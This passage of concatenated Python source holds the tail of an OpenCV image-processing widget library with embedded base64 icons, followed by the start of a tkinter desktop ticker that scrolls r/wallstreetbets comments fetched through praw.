I4FBbOYspeaHXB/aAHsVXpp6p5FYf3gI90SHpltqQEjNNCbZQNydbCJkbOMFAZRM9qD85/uxcdP++Gry0Es2b6ZBFtNtC10b7unUhKQIPN/Rp0hIbNV0ELRDq3mePIp6N77RDO3duFT37ViZ7f9GHgES/8eyKIrcwuQXDKbf7dIUql2ScUvam+8nFhGJVAxzdGrc7Z0BRIbq7qlxhuDV9n2RPx1fgR/84AjP0eaHtG4Ng9CkerH8Y2H2ItPkRXBagWjcIxUEGjm920HnSG0XW3CyN7woh/2USikgZjhqHUrOZU1kRQez5zKfVGxacwG5MDnjrNbHZXssW/ywXno4PQt8bAvpgAq6KLKKOD4g9bkoB2rQl9WwyOH/kR+cUlBL552ZqO09G7YhiuR/oR+locvGT2XiwIfj0GN82MbJiURFQSoFjk2BsCW5zFTdJVseUJ6PvJox7rgn9rn3xjMp3r3Rg87EV8RX4H36xNwHOHR7amZ4KA+Rm9dPhvcEO7lQq98UcnWcNoSjoOBTF6fye85I9jdLa44f1ewJpyKghtiKN3jb2IM4wU2ROEAf3gKFjFLG6UrlKjDOn8ZS9Glntx8aZ+eA+pE0/Ay6msuS1AyXX6cygXMHFHH1hDfsKD9iWa1g8NwyCPNEX8VEzsOgPdN0//Mz6lAopyQGuOy1Z+0CjDNlCyWCTbKuFUBAR2hDHMMt+DUgGN1gGw+vwnJ7EhVk9HldVSS5y8fvBgZi9UKqC2Vl1xLvZzGuiYCxFDm2PoqwnI1mRSArIsi9Zs4Q76xuVqa8sxEeWPBJRhLqKE0jYsW5OZIKD9TnEuxOucYHRi1QgRl9GR36ufSviGOLrWD8rWOCkBtTzPZmNR5k3TfFNKh+r/cBHr5BFa6v7/7nXquTA0huAXpu6T5UrlT6lgJmK+KhxpW2XZc4G4rV46Zr+an57ql8rxzJn30jwXTnBUDuizPsZIlCncVk6DuJG6pKmU0e3kgxM2ffM7byfAS+ZWQEEFHbVJUxnGkgTCjeNrUsYJaeeF/X9PFhYhVo2nWlda9lwiAoh4qqMy///hxAWUa8lgocwD5wuRUOwfnM4Oro/ProITUCC2QoWQc0FBCihSmWovHKMgBRRcJQ/VFKyAIkqpzsgCZQIyU/0yzg5R1lQnTWWoEzA8/wIKL6xJmspQJqAWn38BBSIbq1yhKCukYdLaWlc9gXIhf6V1BQ+AyWcl6gQsEgo2C88NwP8A7JKh2GNdWekAAAAASUVORK5CYII="
@gui.decorate_constructor_parameter_types([cvt_types.keys()])
def __init__(self, conversion_code, *args, **kwargs):
self.conversion_code = self.cvt_types[conversion_code]
super(OpencvCvtColor, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
if emitter.img is None:
return
self.set_image_data(cv2.cvtColor(emitter.img, self.conversion_code))
class OpencvBitwiseNot(OpencvImRead):
""" OpencvBitwiseNot widget.
Allows to invert an image mask.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = default_icon("BitwiseNot")
@gui.decorate_constructor_parameter_types([])
def __init__(self, *args, **kwargs):
super(OpencvBitwiseNot, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
try:
self.set_image_data(cv2.bitwise_not(emitter.img))
except:
print(traceback.format_exc())
class BinaryOperator(object):
def __init__(self, **kwargs):
self.img1 = None
self.img2 = None
def process(self):
#overload this method to perform different operations
if not self.img1 is None:
if not self.img2 is None:
pass
def on_new_image_1_listener(self, emitter):
try:
self.img1 = emitter.img
self.process()
except:
print(traceback.format_exc())
def on_new_image_2_listener(self, emitter):
try:
self.img2 = emitter.img
self.process()
except:
print(traceback.format_exc())
class OpencvBitwiseAnd(OpencvImRead, BinaryOperator):
""" OpencvBitwiseAnd widget.
Allows to do the AND of two images.
- Receives the image on on_new_image_1_listener.
- Receives the mask on on_new_image_2_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = default_icon("BitwiseAND", 1.1)
@gui.decorate_constructor_parameter_types([])
def __init__(self, *args, **kwargs):
BinaryOperator.__init__(self)
super(OpencvBitwiseAnd, self).__init__("", *args, **kwargs)
def process(self):
if not self.img1 is None:
if not self.img2 is None:
self.set_image_data(cv2.bitwise_and(self.img1, self.img1, mask=self.img2))
class OpencvBitwiseOr(OpencvImRead, BinaryOperator):
""" OpencvBitwiseOr widget.
Allows to do the OR of two images.
- Receives the image on on_new_image_1_listener.
- Receives the mask on on_new_image_2_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = default_icon("BitwiseOR")
@gui.decorate_constructor_parameter_types([])
def __init__(self, *args, **kwargs):
BinaryOperator.__init__(self)
super(OpencvBitwiseOr, self).__init__("", *args, **kwargs)
def process(self):
if not self.img1 is None:
if not self.img2 is None:
self.set_image_data(cv2.bitwise_or(self.img1, self.img1, mask=self.img2))
class OpencvAddWeighted(OpencvImRead, BinaryOperator):
""" OpencvAddWeighted widget.
Allows to do the add_weighted of two images.
- Receives first image on on_new_image_1_listener.
- Receives second mask on on_new_image_2_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = "data:image/png;base64,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"
@gui.decorate_constructor_parameter_types([float, float, float])
def __init__(self, alpha, beta, gamma, *args, **kwargs):
self.alpha = alpha
self.beta = beta
self.gamma = gamma
BinaryOperator.__init__(self)
super(OpencvAddWeighted, self).__init__("", *args, **kwargs)
def process(self):
if not self.img1 is None:
if not self.img2 is None:
self.set_image_data(cv2.addWeighted(self.img1, self.alpha, self.img2, self.beta, self.gamma))
class OpencvBilateralFilter(OpencvImRead):
""" OpencvBilateralFilter widget.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
border_type = {"BORDER_CONSTANT": cv2.BORDER_CONSTANT,
"BORDER_REPLICATE": cv2.BORDER_REPLICATE,
"BORDER_REFLECT": cv2.BORDER_REFLECT,
"BORDER_WRAP": cv2.BORDER_WRAP,
"BORDER_REFLECT_101": cv2.BORDER_REFLECT_101,
"BORDER_TRANSPARENT": cv2.BORDER_TRANSPARENT,
"BORDER_REFLECT101": cv2.BORDER_REFLECT101,
"BORDER_DEFAULT": cv2.BORDER_DEFAULT,
"BORDER_ISOLATED": cv2.BORDER_ISOLATED}
icon = "data:image/png;base64,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"
@gui.decorate_constructor_parameter_types([int, float, float, border_type.keys()])
def __init__(self, diameter, sigma_color, sigma_space, border, *args, **kwargs):
self.sigma_color = sigma_color
self.sigma_space = sigma_space
self.diameter = diameter
self.border = self.border_type[border]
super(OpencvBilateralFilter, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
try:
self.image_source = emitter
self.set_image_data(cv2.bilateralFilter(emitter.img, self.diameter, self.sigma_color, self.sigma_space, borderType=self.border))
except:
print(traceback.format_exc())
class OpencvBlurFilter(OpencvImRead):
""" OpencvBlurFilter widget.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = default_icon("Blur")
@gui.decorate_constructor_parameter_types([int, OpencvBilateralFilter.border_type.keys()])
def __init__(self, kernel_size, border, *args, **kwargs):
self.kernel_size = kernel_size
self.border = OpencvBilateralFilter.border_type[border]
super(OpencvBlurFilter, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
try:
self.image_source = emitter
self.set_image_data(cv2.blur(emitter.img, (self.kernel_size,self.kernel_size), borderType=self.border))
except:
print(traceback.format_exc())
def on_kernel_size_listener(self, emitter, value=None):
v = emitter.get_value() if value is None else value
v = int(v)
self.kernel_size = v
if hasattr(self, "image_source"):
self.on_new_image_listener(self.image_source)
class OpencvDilateFilter(OpencvImRead):
""" OpencvDilateFilter widget.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
morph_shape = {"MORPH_RECT": cv2.MORPH_RECT, "MORPH_CROSS": cv2.MORPH_CROSS, "MORPH_ELLIPSE": cv2.MORPH_ELLIPSE}
icon = default_icon("Dilate")
@gui.decorate_constructor_parameter_types([morph_shape.keys(), int, int, OpencvBilateralFilter.border_type.keys()])
def __init__(self, kernel_morph_shape, kernel_size, iterations, border, *args, **kwargs):
self.kernel = cv2.getStructuringElement(self.morph_shape[kernel_morph_shape], (kernel_size, kernel_size))
self.iterations = iterations
self.border = OpencvBilateralFilter.border_type[border]
super(OpencvDilateFilter, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
try:
self.image_source = emitter
self.set_image_data(cv2.dilate(emitter.img, self.kernel, iterations=self.iterations, borderType=self.border))
except:
print(traceback.format_exc())
class OpencvErodeFilter(OpencvImRead):
""" OpencvErodeFilter widget.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
morph_shape = {"MORPH_RECT": cv2.MORPH_RECT, "MORPH_CROSS": cv2.MORPH_CROSS, "MORPH_ELLIPSE": cv2.MORPH_ELLIPSE}
icon = default_icon("Erode")
@gui.decorate_constructor_parameter_types([morph_shape.keys(), int, int, OpencvBilateralFilter.border_type.keys()])
def __init__(self, kernel_morph_shape, kernel_size, iterations, border, *args, **kwargs):
self.kernel = cv2.getStructuringElement(self.morph_shape[kernel_morph_shape], (kernel_size, kernel_size))
self.iterations = iterations
self.border = OpencvBilateralFilter.border_type[border]
super(OpencvErodeFilter, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
try:
self.image_source = emitter
self.set_image_data(cv2.erode(emitter.img, self.kernel, iterations=self.iterations, borderType=self.border))
except:
print(traceback.format_exc())
class OpencvLaplacianFilter(OpencvImRead):
""" OpencvLaplacianFilter widget.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = default_icon("Laplacian")
@gui.decorate_constructor_parameter_types([OpencvBilateralFilter.border_type.keys()])
def __init__(self, border, *args, **kwargs):
self.border = OpencvBilateralFilter.border_type[border]
super(OpencvLaplacianFilter, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
try:
self.image_source = emitter
self.set_image_data(cv2.Laplacian(emitter.img, -1, borderType=self.border))
except:
print(traceback.format_exc())
class OpencvCanny(OpencvImRead):
""" OpencvCanny segmentation widget.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = default_icon("Canny")
@gui.decorate_constructor_parameter_types([int, int])
def __init__(self, threshold1, threshold2, *args, **kwargs):
self.threshold1 = threshold1
self.threshold2 = threshold2
super(OpencvCanny, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter):
try:
self.image_source = emitter
self.set_image_data(cv2.Canny(emitter.img, self.threshold1, self.threshold2))
except:
print(traceback.format_exc())
def on_threshold1_listener(self, emitter, value=None):
v = emitter.get_value() if value is None else value
v = int(v)
self.threshold1 = v
if hasattr(self, "image_source"):
self.on_new_image_listener(self.image_source)
def on_threshold2_listener(self, emitter, value=None):
v = emitter.get_value() if value is None else value
v = int(v)
self.threshold2 = v
if hasattr(self, "image_source"):
self.on_new_image_listener(self.image_source)
#https://docs.opencv.org/3.4/d3/dc0/group__imgproc__shape.html
class OpencvFindContours(OpencvImRead):
""" OpencvFindContours segmentation widget.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
contour_retrieval_mode = {"RETR_LIST": cv2.RETR_LIST, "RETR_EXTERNAL": cv2.RETR_EXTERNAL, "RETR_CCOMP ": cv2.RETR_CCOMP, "RETR_TREE": cv2.RETR_TREE, "RETR_FLOODFILL": cv2.RETR_FLOODFILL}
contour_approximation_method = {"CHAIN_APPROX_NONE":cv2.CHAIN_APPROX_NONE, "CHAIN_APPROX_SIMPLE": cv2.CHAIN_APPROX_SIMPLE, "CHAIN_APPROX_TC89_L1": cv2.CHAIN_APPROX_TC89_L1, "CHAIN_APPROX_TC89_KCOS": cv2.CHAIN_APPROX_TC89_KCOS}
icon = default_icon("FindContours",1.2)
@gui.decorate_constructor_parameter_types([contour_retrieval_mode.keys(), contour_approximation_method.keys()])
def __init__(self, retrieval_mode, approximation_method, *args, **kwargs):
self.retrieval_mode = self.contour_retrieval_mode[retrieval_mode]
self.approximation_method = self.contour_approximation_method[approximation_method]
super(OpencvFindContours, self).__init__("", *args, **kwargs)
self.on_new_contours_result.do = self.do_contours_result
def on_new_image_listener(self, emitter):
try:
self.image_source = emitter
if emitter.img is None:
return
major = cv2.__version__.split('.')[0]
img = emitter.img.copy()
if major == '3':
img, self.contours, self.hierarchy= cv2.findContours(emitter.img.copy(), self.retrieval_mode, self.approximation_method)
else:
self.contours, self.hierarchy= cv2.findContours(img, self.retrieval_mode, self.approximation_method)
img = cv2.drawContours(img, self.contours, -1, 255)
self.set_image_data(img)
self.on_new_contours_result()
except:
print(traceback.format_exc())
def do_contours_result(self, callback, *userdata, **kwuserdata):
#this method gets called when an event is connected, making it possible to execute the process chain directly, before the event triggers
if hasattr(self.on_new_contours_result.event_method_bound, '_js_code'):
self.on_new_contours_result.event_source_instance.attributes[self.on_new_contours_result.event_name] = self.on_new_contours_result.event_method_bound._js_code%{
'emitter_identifier':self.on_new_contours_result.event_source_instance.identifier, 'event_name':self.on_new_contours_result.event_name}
self.on_new_contours_result.callback = callback
self.on_new_contours_result.userdata = userdata
self.on_new_contours_result.kwuserdata = kwuserdata
#here the callback is called immediately to make it possible link to the plc
if callback is not None: #protection against the callback replacements in the editor
callback(self, self.contours, self.hierarchy, *userdata, **kwuserdata)
@gui.decorate_set_on_listener("(self, emitter, contours, hierarchy)")
@gui.decorate_event
def on_new_contours_result(self):
return (self.contours, self.hierarchy)
|
wsbticker.py
|
import praw
import json
import pprint
from datetime import datetime
import time
import threading
import tkinter as tk
from yahoofinancials import YahooFinancials
from tkinter import *
import webbrowser
import configparser
import os
from os import path
import tkinter.messagebox
config = configparser.ConfigParser()
config.read('wsbt_config.ini')
if not path.exists("praw.ini"):
tkinter.messagebox.showerror("Error", "The praw.ini file is not found. Please redownload the application.")
os._exit(1)
if not path.exists("gripbar.gif"):
tkinter.messagebox.showerror("Error", "The gripbar.gif file is not found. Please redownload the application.")
os._exit(1)
if 'SETTINGS' in config:
if 'screen_width' in config['SETTINGS']:
screen_width = int(config['SETTINGS']['screen_width'])
if 'stocks' in config['SETTINGS']:
stocks = config['SETTINGS']['stocks']
stocks = [x.strip() for x in stocks.split(',')]
if 'font_size' in config['SETTINGS']:
font_size = int(config['SETTINGS']['font_size'])
if 'theme' in config['SETTINGS']:
theme = config['SETTINGS']['theme']
try: screen_width
except NameError: screen_width = 1920
try: stocks
except NameError: stocks = ['AAPL', 'MSFT', 'LYFT', 'TSLA', 'GOOGL']
try: theme
except NameError: theme = 'blue'
if theme not in ['blue', 'black', 'white', 'mods']:
theme = 'blue'
try: font_size
except NameError: font_size = 20
themecolors = {}
themecolors['blue'] = {'bg' : 'blue', 'fg' : 'white', 'user' : '#90ee90', 'mods' : 'pink'}
themecolors['black'] = {'bg' : 'black', 'fg' : 'gold', 'user' : '#90ee90', 'mods' : 'pink'}
themecolors['white'] = {'bg' : 'white', 'fg' : 'black', 'user' : 'green', 'mods' : 'pink'}
themecolors['mods'] = {'bg' : 'pink', 'fg' : 'yellow', 'user' : 'green', 'mods' : 'red'}
stock_dict = {}
comment_dict = {}
comments_in_queue = 0
ticker_paused = 0
tick_rate = 100
old_comments = []
stickies = []
mod_list = []
reddit = praw.Reddit(user_agent='WSB Ticker',
client_id='IniTKSLJs8hlfg', client_secret=None)
class App(tk.Tk):
def __init__(self):
tk.Tk.__init__(self)
self.floater = FloatingWindow(self)
class FloatingWindow(tk.Toplevel):
def __init__(self, *args, **kwargs):
tk.Toplevel.__init__(self, *args, **kwargs)
self.overrideredirect(True)
path = "gripbar.gif"
self.gripbar = tk.PhotoImage(file=path)
#self.label = tk.Label(self, text="Click on the grip to move")
self.grip = tk.Label(self, image=self.gripbar, width=25, height=25)
self.grip.pack_propagate(0)
self.grip.pack(side="left", fill="y")
#self.label.pack(side="right", fill="both", expand=True)
self.grip.bind("<ButtonPress-1>", self.StartMove)
self.grip.bind("<ButtonRelease-1>", self.StopMove)
self.grip.bind("<B1-Motion>", self.OnMotion)
self.popup_menu = tk.Menu(self, tearoff=0)
self.popup_menu.add_command(label="Pause", command=self.pauseTicker)
self.popup_menu.add_command(label="Resume", command=self.resumeTicker)
self.speed_submenu = tk.Menu(self.popup_menu)
self.speed_submenu.add_command(label="Slow", command=lambda: self.setSpeed(200))
self.speed_submenu.add_command(label="Med", command=lambda: self.setSpeed(100))
self.speed_submenu.add_command(label="Fast", command=lambda: self.setSpeed(50))
self.popup_menu.add_cascade(label='Tick Speed', menu=self.speed_submenu, underline=0)
self.theme_submenu = tk.Menu(self.popup_menu)
self.theme_submenu.add_command(label="Blue", command=lambda: self.setTheme('blue'))
self.theme_submenu.add_command(label="Black", command=lambda: self.setTheme('black'))
self.theme_submenu.add_command(label="White", command=lambda: self.setTheme('white'))
self.theme_submenu.add_command(label="Mods", command=lambda: self.setTheme('mods'))
self.popup_menu.add_cascade(label='Theme', menu=self.theme_submenu, underline=0)
self.popup_menu.add_command(label="Close",
command=self.destroy_root)
self.bind("<Button-3>", self.popup) # Button-2 on Aqua
def StartMove(self, event):
self.x = event.x
self.y = event.y
def StopMove(self, event):
self.x = None
self.y = None
def OnMotion(self, event):
deltax = event.x - self.x
deltay = event.y - self.y
x = self.winfo_x() + deltax
y = self.winfo_y() + deltay
self.geometry("+%s+%s" % (x, y))
def popup(self, event):
try:
self.popup_menu.tk_popup(event.x_root, event.y_root, 0)
finally:
self.popup_menu.grab_release()
def destroy_root(self):
global root
root.quit()
root.destroy()
os._exit(1)
def pauseTicker(self):
global ticker_paused
ticker_paused = 1
def resumeTicker(self):
global ticker_paused
ticker_paused = 0
def setSpeed(self, ts):
global tick_rate
tick_rate = ts
def setTheme(self, new_theme):
global theme
theme = new_theme
marquee.config(bg=themecolors[theme]['bg'], fg=themecolors[theme]['fg'])
def showLink(event):
webbrowser.open(event.widget.tag_names(CURRENT)[1])
def printLink(event):
print(event.widget.tag_names(CURRENT)[1])
root = App()
root.withdraw()
f = Frame(root.floater, height=font_size*1.4, width=screen_width-32)
root.floater.geometry("+0+800")
f.pack_propagate(0) # don't shrink
f.pack()
marquee = Text(f, bg=themecolors[theme]['bg'], fg=themecolors[theme]['fg'],font=("Lucida Console", font_size))
#marquee.bind("<Button-1>", showLink)
marquee.pack(fill=BOTH, expand=1)
root.floater.wm_attributes("-topmost", 1)
i = 0
def check_stickies():
global stickies
global stream
stickies = []
for submission in reddit.subreddit('wallstreetbets').hot(limit=5):
if submission.stickied:
stickies.append('t3_' +submission.id)
time.sleep(300)
def get_mods():
global mod_list
for moderator in reddit.subreddit('wallstreetbets').moderator():
mod_list.append(moderator)
def create_ticker(i):
global stream
global ticker_paused
global mod_list
if not ticker_paused:
cursor_position = 0
marquee.delete('1.0', END)
comment_count = 0
#Trim comment dict if it gets too long
if len(comment_dict) > 100:
print("Trimming comments")
for index, comment in enumerate(list(comment_dict)):
if index > 10 and index % 2 != 0:
del comment_dict[comment]
for comment in list(comment_dict):
if cursor_position < (screen_width/10):
if len(comment_dict[comment]['author']) > 0 or len(comment_dict[comment]['body']) > 0:
if len(comment_dict[comment]['author']) > 0:
if comment_dict[comment]['original_author'] in mod_list:
marquee.insert("1."+str(cursor_position), comment_dict[comment]['author'], ('author_is_mod', comment_dict[comment]['author_link']))
else:
marquee.insert("1."+str(cursor_position), comment_dict[comment]['author'], ('author', comment_dict[comment]['author_link']))
#marquee.tag_add("start", "1."+str(cursor_position), "1."+str(cursor_position + len(comment_dict[comment]['author'])))
cursor_position += len(comment_dict[comment]['author'])
marquee.insert("1."+str(cursor_position), comment_dict[comment]['body'], ('link', str(comment_dict[comment]['link'])))
cursor_position += len(comment_dict[comment]['body'])
else:
marquee.insert("1."+str(cursor_position), comment_dict[comment]['body'], ('link', str(comment_dict[comment]['link'])))
cursor_position += len(comment_dict[comment]['body'])
if comment_count == 0:
comment_count+=1
if len(comment_dict[comment]['author']) >0:
comment_dict[comment]['author'] = comment_dict[comment]['author'][1:]
else:
comment_dict[comment]['body'] = comment_dict[comment]['body'][1:]
else:
del comment_dict[comment]
marquee.tag_bind('link', '<Button-1>', showLink)
marquee.tag_bind('author', '<Button-1>', showLink)
marquee.tag_config("author", foreground=themecolors[theme]['user'])
marquee.tag_config("author_is_mod", foreground=themecolors[theme]['mods'])
root.after(tick_rate, lambda:create_ticker(i))
def get_comments():
print("updating")
global stream
global old_comments
global comment_dict
global comments_in_queue
comment_dict['welcome'] = {}
comment_dict['welcome']['author'] = " /u/MSMSP: "
comment_dict['welcome']['author_link'] = "https://old.reddit.com/u/MSMSP"
